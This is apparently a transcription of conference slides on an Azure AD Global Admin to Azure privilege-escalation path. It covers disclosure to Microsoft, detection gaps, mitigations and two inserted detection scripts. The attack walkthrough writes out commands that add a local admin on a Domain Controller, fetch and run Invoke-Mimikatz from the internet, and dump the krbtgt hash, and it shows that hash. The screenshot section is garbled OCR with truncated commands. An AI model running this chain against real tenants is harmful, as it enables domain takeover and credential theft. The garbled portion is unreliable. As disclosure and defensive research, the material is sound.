* Compromise an on-prem AD user account to compromise the AWS EC2 instances (VMs) and run code on the DCs

* Amazon SSM is installed by default on most Amazon-provided instances (templates); a role is needed to execute commands through it

* Ensure that admin groups & roles only contain admin accounts that are well protected.

* Hopefully you are logging this and looking at the logs (CloudTrail), and the logs can't be deleted.
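The CloudTrail review the last bullets call for, as an added example that is not part of the presentation: it runs over constructed CloudTrail records (the account id, the role name "AWS-EC2-Administration" and the instance ids are placeholders) and flags federated sign-ins into an admin role and SSM SendCommand calls aimed at the EC2 instances that host Domain Controllers.

```python
"""Detection over CloudTrail records for the federated-admin -> SSM-on-DC path.

Added example; not from the presentation. Record shapes follow CloudTrail
(eventSource, eventName, userIdentity, requestParameters); the account id,
role name and instance ids below are constructed placeholders.
"""
import json
from typing import Optional

# Constructed: IAM roles that on-prem AD admin groups federate into, and the
# EC2 instance ids that run Domain Controllers.
ADMIN_ROLES = {"AWS-EC2-Administration"}
DC_INSTANCE_IDS = {"i-0dc0000000000001", "i-0dc0000000000002"}

# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    {"eventSource": "sts.amazonaws.com", "eventName": "AssumeRoleWithSAML",
     "userIdentity": {"type": "SAMLUser", "userName": "hansolo@acme.example"},
     "requestParameters": {
         "roleArn": "arn:aws:iam::111122223333:role/AWS-EC2-Administration",
         "principalArn": "arn:aws:iam::111122223333:saml-provider/ADFS"}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::111122223333:assumed-role/AWS-EC2-Administration/hansolo"},
     "requestParameters": {"documentName": "AWS-RunPowerShellScript",
                           "instanceIds": ["i-0dc0000000000001"]}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",   # non-DC target: benign
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::111122223333:assumed-role/AWS-EC2-Administration/hansolo"},
     "requestParameters": {"documentName": "AWS-RunShellScript",
                           "instanceIds": ["i-0web000000000001"]}},
    {"eventSource": "sts.amazonaws.com", "eventName": "AssumeRoleWithSAML",  # non-admin role: benign
     "userIdentity": {"type": "SAMLUser", "userName": "leia@acme.example"},
     "requestParameters": {
         "roleArn": "arn:aws:iam::111122223333:role/ReadOnly",
         "principalArn": "arn:aws:iam::111122223333:saml-provider/ADFS"}},
]


def role_name_from_arn(arn: str) -> str:
    """'arn:...:role/Name' or 'arn:...:assumed-role/Name/session' -> 'Name'."""
    resource = arn.split(":", 5)[-1]            # e.g. 'assumed-role/Name/session'
    parts = resource.split("/")
    return parts[1] if len(parts) > 1 else resource


def classify(event: dict) -> Optional[dict]:
    """Return a finding for an event that matters on this path, else None."""
    src, name = event.get("eventSource"), event.get("eventName")
    ident = event.get("userIdentity", {}) or {}
    params = event.get("requestParameters", {}) or {}
    if src == "sts.amazonaws.com" and name == "AssumeRoleWithSAML":
        role = role_name_from_arn(params.get("roleArn", ""))
        if role in ADMIN_ROLES:
            return {"severity": "medium", "actor": ident.get("userName"),
                    "reason": f"federated sign-in to admin role {role}"}
    if src == "ssm.amazonaws.com" and name == "SendCommand":
        targets = set(params.get("instanceIds", [])) & DC_INSTANCE_IDS
        if targets:
            role = role_name_from_arn(ident.get("arn", ""))
            severity = "high" if role in ADMIN_ROLES else "medium"
            return {"severity": severity, "actor": ident.get("arn"),
                    "reason": f"SSM {params.get('documentName')} sent to DC instance(s) {sorted(targets)}"}
    return None


def detect(events: list) -> list:
    """All findings, in log order."""
    return [f for f in (classify(e) for e in events) if f]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(json.dumps(finding))
```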
From Azure AD to Azure

An Unanticipated Attack Path

https://adsecurity.org/?p=4277

Note that it's possible that Microsoft has made changes to elements described in this section since I performed this research and reported the issue.
Differences between Azure roles and Azure AD roles

At a high level, Azure roles control permissions to manage Azure resources, while Azure AD roles control permissions to manage Azure Active Directory resources. The following table compares some of the differences.

Azure roles                                         | Azure AD roles
----------------------------------------------------+---------------------------------------------------
Manage access to Azure resources                    | Manage access to Azure Active Directory resources
Supports custom roles                               | Supports custom roles
Scope can be specified at multiple levels           | Scope is at the tenant level
(management group, subscription, resource group,    |
resource)                                           |
Role information can be accessed in Azure portal,   | Role information can be accessed in Azure admin
Azure CLI, Azure PowerShell, Azure Resource         | portal, Microsoft 365 admin center, Microsoft
Manager templates, REST API                         | Graph, AzureAD PowerShell
Do Azure roles and Azure AD roles overlap?

By default, Azure roles and Azure AD roles do not span Azure and Azure AD. However, if a Global Administrator elevates their access by choosing the Access management for Azure resources switch in the Azure portal, the Global Administrator will be granted the User Access Administrator role (an Azure role) on all subscriptions for a particular tenant.


Global Administrator / Company Administrator

Users with this role have access to all administrative features in Azure Active Directory, as well as services that use [...] The person who signs up for the Azure Active Directory tenant becomes a global administrator. Only global administrators can assign other administrator roles. There can be more than one global administrator at your company. Global admins can reset the password for any user and all other administrators.

Note

In Microsoft Graph API, Azure AD Graph API, and Azure AD PowerShell, this role is identified as "Company Administrator". It is "Global Administrator" in the Azure portal.

Global Administrator / Company Administrator

Users with this role have access to all administrative features in Azure Active Directory, as well as services that use Azure Active Directory identities like Microsoft 365 security center, Microsoft 365 compliance center, Exchange Online, SharePoint Online, and Skype for Business Online. The person who signs up for the Azure AD organization becomes a global administrator. There can be more than one global administrator at your company. Global admins can reset the password for any user and all other administrators.

Note

In the Microsoft Graph API and Azure AD PowerShell, this role is identified as "Company Administrator". It is "Global Administrator" in the Azure portal.


[Screenshot: Azure portal, Azure Active Directory > Properties for the "Trimarc R&D" tenant (tenant ID 1058307b-ab46-4062-ace3-e08267670b92; country United States; location United States datacenters; technical contact sean@trimarcsecurity.com). At the bottom of the blade is the "Access management for Azure resources" toggle with its "Learn more" link.]
Access management for Azure resources

When you set the toggle to Yes, you are assigned the User Access Administrator role in Azure RBAC at root scope (/). This grants you permission to assign roles in all Azure subscriptions and management groups associated with this Azure AD directory. This toggle is only available to users who are assigned the Global Administrator role in Azure AD.

When you set the toggle to No, the User Access Administrator role in Azure RBAC is removed from your user account. You can no longer assign roles in all Azure subscriptions and management groups that are associated with this Azure AD directory. You can view and manage only the Azure subscriptions and management groups to which you have been granted access.

Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com

How does elevate access work?

Azure AD and Azure resources are secured independently from one another. That is, Azure AD role assignments do not grant access to Azure resources, and Azure role assignments do not grant access to Azure AD.

Use this capability if you don't have access to Azure subscription resources, such as virtual machines or storage accounts, and you want to use your Global Administrator privilege to gain access to those resources.

When you elevate your access, you will be assigned the User Access Administrator role in Azure at root scope (/).

User Access Administrator role assignments can be removed using PowerShell.

docs.microsoft.com/en-us/azure/role-based-access-control/elevate-access-global-admin
Except...

Note

If you're using Azure AD Privileged Identity Management (PIM), deactivating your role assignment does not change this toggle to No. To maintain least privileged access, we recommend that you set this toggle to No before you deactivate your role assignment.
Global Administrator - Elevate Access (Elevate Access API)

Elevates access for a Global Administrator.

HTTP

URI Parameters

Name         In     Required  Type    Description
api-version  query  True      string  The API version to use for this operation

Responses

Name    Type  Description
200 OK        OK - Returns an HttpResponseMessage with HttpStatusCode 200

Security
Ryan Hausknecht
@Haus3c

Added a new function, Set-ElevatedPrivileges, to PowerZure that will elevate your privileges from AAD 'Global Administrator' to Azure 'User Access Administrator' as outlined by here: via REST API call.

[Screenshot residue: the tweet quotes the "How does elevate access work?" documentation text above and the ADSecurity post "From Azure AD to Active ... An Unanticipated Attack Path".]

github.com/hausec/PowerZure
Compromise Office 365 Global Admin

[Screenshot: Azure portal, Trimarc R&D - Overview (trimarcrd.com, "Azure AD for Office 365"), showing "Your role: Global administrator".]

Black Hat - Admin Account Take Over Defense

MFA Your ADMINS!

* Admin Accounts with MFA Sept 2017: 0.7%
* Admin Accounts with MFA Sept 2018: 1.7%
* Admin Accounts with MFA Aug 2019: 7.94%!

[Diagram: the "Access management for Azure resources" toggle set to Yes turns an (Office 365) Global Admin into an (Azure) User Access Administrator.]
Hacker Account Added to User Access Administrator

User Access Administrator

Name                      Principal                       Role                        Scope
AzureAdmin                AzureAdmin@trimarcrd.com        User Access Administrator   Root (Inherited)
Azure AD Service Account  AzureADService@trimarcrd.com    User Access Administrator   Root (Inherited)
Hacker                    Hacker@trimarcrd.com            User Access Administrator   Root (Inherited)
Sean Metcalf              sean@trimarcrd.com              User Access Administrator   Root (Inherited)
Azure RBAC Role Monitoring

Azure CLI

VERBOSE: Authenticating to Azure ...
VERBOSE: Building your Azure drive ...
PS /home/sean> az role assignment list --role "User Access Administrator" --scope "/"
[
  {
    "canDelegate": null,
    "id": "/providers/Microsoft.Authorization/roleAssignments/309cac73-b7b5-4990-a779-2c75e083ddc6",
    "name": "309cac73-b7b5-4990-a779-2c75e083ddc6",
    "principalId": "22ef4fff-699d-4177-9327-2b2c071c1201",
    "principalName": "Hacker@trimarcrd.com",
    "principalType": "User",
    "roleDefinitionId": "/providers/Microsoft.Authorization/roleDefinitions/18d7d88d-d35e-4fb5-a5c3-7773c20a72d9",
    "roleDefinitionName": "User Access Administrator",
    "scope": "/",
    "type": "Microsoft.Authorization/roleAssignments"
  },
  {
    "canDelegate": null,
    "id": "/providers/Microsoft.Authorization/roleAssignments/cd26d014-4f44-4802-b07d-3cfe28712c07",
    "name": "cd26d014-4f44-4802-b07d-3cfe28712c07",
    "principalId": "42712e25-96f6-4c0e-9a25-6de8c2d04c4c",
    "principalName": "AzureAdmin@trimarcrd.com",
    "principalType": "User",
    "roleDefinitionId": "/providers/Microsoft.Authorization/roleDefinitions/18d7d88d-d35e-4fb5-a5c3-7773c20a72d9",
    "roleDefinitionName": "User Access Administrator",
    "scope": "/",
    "type": "Microsoft.Authorization/roleAssignments"
  },
  {
    "canDelegate": null,
    "id": "/providers/Microsoft.Authorization/roleAssignments/37cc6353-24e9-4554-ad13-4e3bad983f8c",
    "name": "37cc6353-24e9-4554-ad13-4e3bad983f8c",
    "principalId": "71575fad-39b2-475a-b519-314dde65e7cf",
    "principalName": "sean@trimarcrd.com",
    "principalType": "User",
    "roleDefinitionId": "/providers/Microsoft.Authorization/roleDefinitions/18d7d88d-d35e-4fb5-a5c3-7773c20a72d9",
    "roleDefinitionName": "User Access Administrator",
    "scope": "/",
    "type": "Microsoft.Authorization/roleAssignments"
  },
  {
    "canDelegate": null,
    "id": "/providers/Microsoft.Authorization/roleAssignments/7daf7191-f4b3-4d1e-994c-cbe7518b8a7b",
    "name": "7daf7191-f4b3-4d1e-994c-cbe7518b8a7b",
    "principalId": "cdb8f6c8-692e-4109-87e2-a4e7a6c76afa",
    ... (output cut off in the screenshot)
What About Removal?

Remove role assignments

Role assignments created at root scope must be removed by using the command line. Learn more

Azure PowerShell

# Find the root-scope (/) User Access Administrator assignment for one account
Get-AzRoleAssignment | where {$_.RoleDefinitionName -eq "User Access Administrator" `
    -and $_.SignInName -eq "<username@example.com>" -and $_.Scope -eq "/"}
Get Azure Owner Rights!

[Screenshot: Azure role assignment list showing Hacker (Hacker@trimarcrd.com) and Sean Metcalf (sean@trimarcrd.com), type User.]
Virtual Machine Contributor

"... lets you manage virtual machines, but not access to them, and not the virtual network or storage account they're connected to."

https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-contributor

Permission: Microsoft.Compute/virtualMachines/runCommand/

[Screenshot: Azure portal VM blade, Operations > Run command. The description text is cut off in the slide ("Run Command uses the VM ac..." / "...and for general machine and a..."). Listed commands include RunPowerShellScript, DisableNLA, EnableAdminAccount, EnableEMS, EnableRemotePS, IPConfig, ...]
Add Attacker Controlled Account to Virtual Machine Contributor

Virtual Machine Contributor

Name                      Principal                       Role
Azure AD Service Account  AzureADService@trimarcrd.com    Virtual Machine Contributor
Hacker                    Hacker@trimarcrd.com            Virtual Machine Contributor
Run Command Script

[Screenshot: Azure portal, VM AcmeIODC01 > Run command > RunPowerShellScript. Status: Script execution complete.]

PowerShell Script
Invoke-Command -ScriptBlock {net localgroup administrators /add $args[0]} -ArgumentList("ACME\HanSolo")

Output:
The command completed successfully.
PS C:\> Get-ADGroupMember 'Administrators' | select distinguishedName

distinguishedName
-----------------
[two entries unreadable in the screenshot]
CN=InsightMgr,OU=Service Accounts,DC=theacme,DC=io
CN=ForeFrontAdmin,OU=Service Accounts,DC=theacme,DC=io
CN=Brightmailsvc,OU=Service Accounts,DC=theacme,DC=io
CN=Domain Admins,CN=Users,DC=theacme,DC=io
CN=Enterprise Admins,CN=Users,DC=theacme,DC=io
CN=TrimarcAdmin,OU=Admin Accounts,OU=AD Management,DC=theacme,DC=io
Event Properties - Event 4103, PowerShell (Microsoft-Windows-PowerShell)

General  Details

CommandInvocation(Invoke-Command): "Invoke-Command"
ParameterBinding(Invoke-Command): name="ScriptBlock"; value="net localgroup administrators /add $args[0]"
ParameterBinding(Invoke-Command): name="ArgumentList"; value="ACME\HanSolo"

Context:
        Severity = Informational
        Host Name = ConsoleHost
        Host Version = 5.1.14393.3053
        Host ID = 9adee254-c238-4d32-9885-c76d9995f4c9
        Host Application = powershell -ExecutionPolicy Unrestricted -File script2.ps1
        Engine Version = 5.1.14393.3053
        Runspace ID = d9c5cd75-ed1e-49fe-b37f-dc9038d30795
        Pipeline ID = 1
        Command Name = Invoke-Command
        Command Type = Cmdlet
        Script Name = C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\[version]\Downloads\script2.ps1
        Command Path =
        Sequence Number = 16
        User = ACME\SYSTEM
        Connected User =
        Shell ID = Microsoft.PowerShell

Log Name:  Microsoft-Windows-PowerShell/Operational
Source:    PowerShell (Microsoft-Windows-PowerShell)    Logged:        7/2019 2:42:53 AM
Event ID:  4103                                         Task Category: Executing Pipeline
Level:     Information                                  Keywords:      None
User:      SYSTEM                                       Computer:      AcmeIODC01.theacme.io
OpCode:    To be used when operation ...

AcmelODCO1 - Run command Run Command Script 
AcmelODC01 - Run commaı 


Script execution complete 


à PowerShell Script 
Locks 


IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/mattifestatio 


Export template $m = Invoke-Mimikatz -Command '"privilege::debug" "lsadump::lsa /inject /name:krbtgt" exit’; 


$m 


Operations 
Auto-shutdown 
Backup 
Disaster recovery 
Update management 
Inventory 
Change tracking 
Configuration management .. 
Policies 


mimikatz(powershell) # lsadump::lsa /inject /name:krbtgt 
Run command Domain : ACME / S-1-5-21-143179592-3749324205-2095737646 


Monitoring RID : 600001f6 (502) 
User : krbtgt 
Insights (preview) 

* Primary 

"7 Alerts NTLM : 81c2c39603f49ef47b6c3df7bb6d6173 
LM ` 
Hash NTLM: 81c2c39603f49ef47b6c3df7bb6d6173 Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com 
ntlm- 0: 81c2c39603f49ef47b6c3df7bb6d6173 


Metrics 


Diagnostic settinds 


Import-module 


Connect-AzAccount 


e You have chosen to open: 
Get-AzLocation select P 


= Inv-Mmk.txt 


which is: Text Document (2.1 MB) 


from: https://attackstorage.blob.core.windows.net 


New-AzResourceGroup -Name -Location 


= New-AzStorageAccount -ResourceGroupName ` What should Firefox do with this file? 
-Name é © Open with | Notepad (default) 
-SkuName S 
-Location @ Save File 
Context 


Cancel 


New-AzStorageContainer Name -Context -Permission 


# upload a file 
Set-AzStorageBlobContent -File 
-Container ` 

-Blob 


-Context PS C:\> Get-AzStorageBlob -Container $ContainerName -Context $ctx S , 
\ = Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com 


AccountName: attackstorage, ContainerName: quickstartblobs 


Name BlobType Length ContentType LastModified AccessTier SnapshotTime 


Inv-Mmk.txt BlockBlob 2206861 application/octet-stream 2020-07-28 17:06:25Z Hot 


New Tab x 4- 


C @ https://attackstorage.blob.core.windows.net/quickstartblobs/Inv-Mmk.txt 


Access management for Azure resources

AzureAdmin@trimarcrd.com (AzureAdmin@trimarcrd.com) can manage access to all Azure subscriptions and management groups in this directory. Learn more

Yes  No

[Diagram: (Office 365) Global Admin -> toggle set to Yes -> (Azure) User Access Administrator -> Add to Role -> (Azure) Subscription Admin.]
Separation of Administration

* Companies often have 2 groups managing different systems.
* One team typically manages Active Directory & Azure AD.
* Another team typically manages servers on-prem and in the cloud (IAAS).
* These teams expect that they have exclusive control of their respective areas.
Why is this important?

* Customers usually have no expectation that an Office 365 Global Administrator has the ability to control Azure role membership.
* Microsoft documented Global Administrator as an "Office 365 Admin", not as an Office 365 & potential Azure administrator.
* Office 365 (Azure AD) Global Administrators can gain Azure subscription role administration access by toggling a single switch.
* Azure doesn't have great granular control over who can run commands on Azure VMs that are sensitive like Azure hosted Domain Controllers.
* Once the "Access management for Azure resources" bit is set, it stays set until the account that toggled the setting to "Yes" later changes it to "No".
* Removing the account from Global Administrators does not remove the account from "User Access Administrator" access either.
Detection Key Points

* Can't detect this setting on Azure AD user accounts using PowerShell, the portal, or any other method.
* No Office 365/Azure AD logging I can find states that an Azure AD account has set this bit ("Access management for Azure resources").
* No (Azure AD/O365) Audit Logs entry clearly identifies this change.
* The Core Directory, DirectoryManagement "Set Company Information" log shows success for the tenant name and the account that performed it. However, this only identifies that something changed relating to "Company Information"; no detail is logged other than "Set Company Information", and in the event the Modified Properties section is empty, stating "No modified properties".
* Didn't find any default Azure logging after adding this account to the VM Contributor role in Azure.
Azure AD to Azure Mitigation

* Monitor the Azure AD role "Global Administrator" for membership changes.
* Enforce MFA on all accounts in the Global Administrator role.
* Control the Global Administrator role with Azure AD Privileged Identity Management (PIM).
* Monitor the Azure RBAC role "User Access Administrator" for membership changes.
* Ensure sensitive systems like Domain Controllers in Azure are isolated and protected as much as possible. Ideally, use a separate tenant for sensitive systems.
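One way to do the "User Access Administrator" monitoring from this list, and from the Azure CLI slide earlier, as an added example that is not the presentation's code: it takes the JSON printed by az role assignment list --role "User Access Administrator" --scope "/" (here a constructed sample shaped like that output; the subscription GUID is a placeholder) and diffs the root-scope holders against an approved baseline, reporting both unexpected additions and baseline accounts whose assignment has vanished.

```python
"""Baseline check for root-scope User Access Administrator (UAA) assignments.

Added example, not from the presentation. Input is the JSON that
    az role assignment list --role "User Access Administrator" --scope "/"
prints. Output: principals holding UAA at root scope ("/") that are not in
the baseline, baseline principals that no longer hold it, and any
non-user principals holding it.
"""
import json

# Built-in role definition id for User Access Administrator (as in the CLI output on the slide).
UAA_ROLE_DEFINITION_ID = "18d7d88d-d35e-4fb5-a5c3-7773c20a72d9"
UAA_ROLE_DEFINITION_PATH = "/providers/Microsoft.Authorization/roleDefinitions/" + UAA_ROLE_DEFINITION_ID

# Constructed baseline: the principals expected to hold UAA at root scope.
BASELINE_PRINCIPALS = {
    "azureadmin@trimarcrd.com",
    "azureadservice@trimarcrd.com",
    "sean@trimarcrd.com",
}

# Constructed sample modelled on the az CLI output shown earlier (not real data).
SAMPLE_OUTPUT = json.dumps([
    {"principalName": "AzureAdmin@trimarcrd.com", "principalType": "User",
     "roleDefinitionId": UAA_ROLE_DEFINITION_PATH,
     "roleDefinitionName": "User Access Administrator", "scope": "/"},
    {"principalName": "AzureADService@trimarcrd.com", "principalType": "User",
     "roleDefinitionId": UAA_ROLE_DEFINITION_PATH,
     "roleDefinitionName": "User Access Administrator", "scope": "/"},
    {"principalName": "Hacker@trimarcrd.com", "principalType": "User",
     "roleDefinitionId": UAA_ROLE_DEFINITION_PATH,
     "roleDefinitionName": "User Access Administrator", "scope": "/"},
    # Subscription-scoped assignment: not a root-scope elevation, so it is ignored.
    {"principalName": "sean@trimarcrd.com", "principalType": "User",
     "roleDefinitionId": UAA_ROLE_DEFINITION_PATH,
     "roleDefinitionName": "User Access Administrator",
     "scope": "/subscriptions/00000000-0000-0000-0000-000000000000"},
])


def root_scope_uaa(assignments: list) -> list:
    """Keep only User Access Administrator assignments at root scope (/)."""
    return [
        a for a in assignments
        if a.get("scope") == "/"
        and a.get("roleDefinitionId", "").endswith(UAA_ROLE_DEFINITION_ID)
    ]


def review(cli_json: str, baseline=BASELINE_PRINCIPALS) -> dict:
    """Compare root-scope UAA holders against the baseline (UPNs compared case-insensitively)."""
    holders = {a["principalName"].lower(): a for a in root_scope_uaa(json.loads(cli_json))}
    expected = {p.lower() for p in baseline}
    return {
        "unexpected": sorted(holders.keys() - expected),
        "missing": sorted(expected - holders.keys()),
        "non_user": sorted(p for p, a in holders.items() if a.get("principalType") != "User"),
    }


if __name__ == "__main__":
    print(json.dumps(review(SAMPLE_OUTPUT), indent=2))
```

Run it on the real CLI output by piping the command's stdout into review(); a non-empty "missing" list is just as interesting as an "unexpected" one, since stripping legitimate admins out of roles is part of the "How bad can this get?" scenario later.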
MSRC Reporting Timeline

Reported to Microsoft in September 2019.

MSRC responds in early October 2019:
"Based on [internal] conversations this appears to be By Design and the documentation is being updated."

Sent MSRC additional information in mid October 2019 after a day of testing detection and potential logging.

MSRC responds that "most of what you have is accurate".

Sent MSRC update in late January 2020 letting them know that I would be submitting this as part of a larger presentation to Black Hat USA & DEF CON (2020).

MSRC acknowledges.
Sent MSRC notification that I would be sharing this information in this blog.
Documentation updated - June 2020.
MSRC Security incident still open as of July 2020.
I was informed by Microsoft during my interactions with MSRC that they are looking into re-working this functionality to resolve some of the shortcomings I identified.
How bad can this get?

Attacker takes control of Azure resources
Removes accounts from all Roles
Ransom the Azure environment

Azure Ransomware?
AzureWare?
Next Level

[Diagram: Microsoft Azure as Identity Provider, AWS as Service Provider. Azure Active Directory acts as the SAML IdP ("AAD SAML Identity") and AWS IAM Roles trust that SAML IdP. A client using a browser goes from the Access Panel / Azure login endpoint to the AWS SSO endpoint and on to the AWS Management Console.]
Google Cloud Platform (GCP)

[Diagram, built up over several slides, showing Azure and Google Cloud Platform (GCP) alongside each other.]
"Don't want all my eggs in one basket... So now eggs are in all baskets."

Conclusion

* Given that cloud IAAS is similar to on-prem virtualization, cloud attacks are similar as well.
* Connection points between on-prem & cloud need to be carefully considered.
* Domain Controllers can be vulnerable no matter where they are located (on-prem & in the cloud).
* Authentication flows between on-prem & cloud (and cloud to cloud!) can be vulnerable.
* Protecting admin accounts is even more important in a cloud-enabled world.

Sean Metcalf (@PyroTek3)
sean@trimarcsecurity.com
Slides: Presentations.ADSecurity.org
www.ADSecurity.org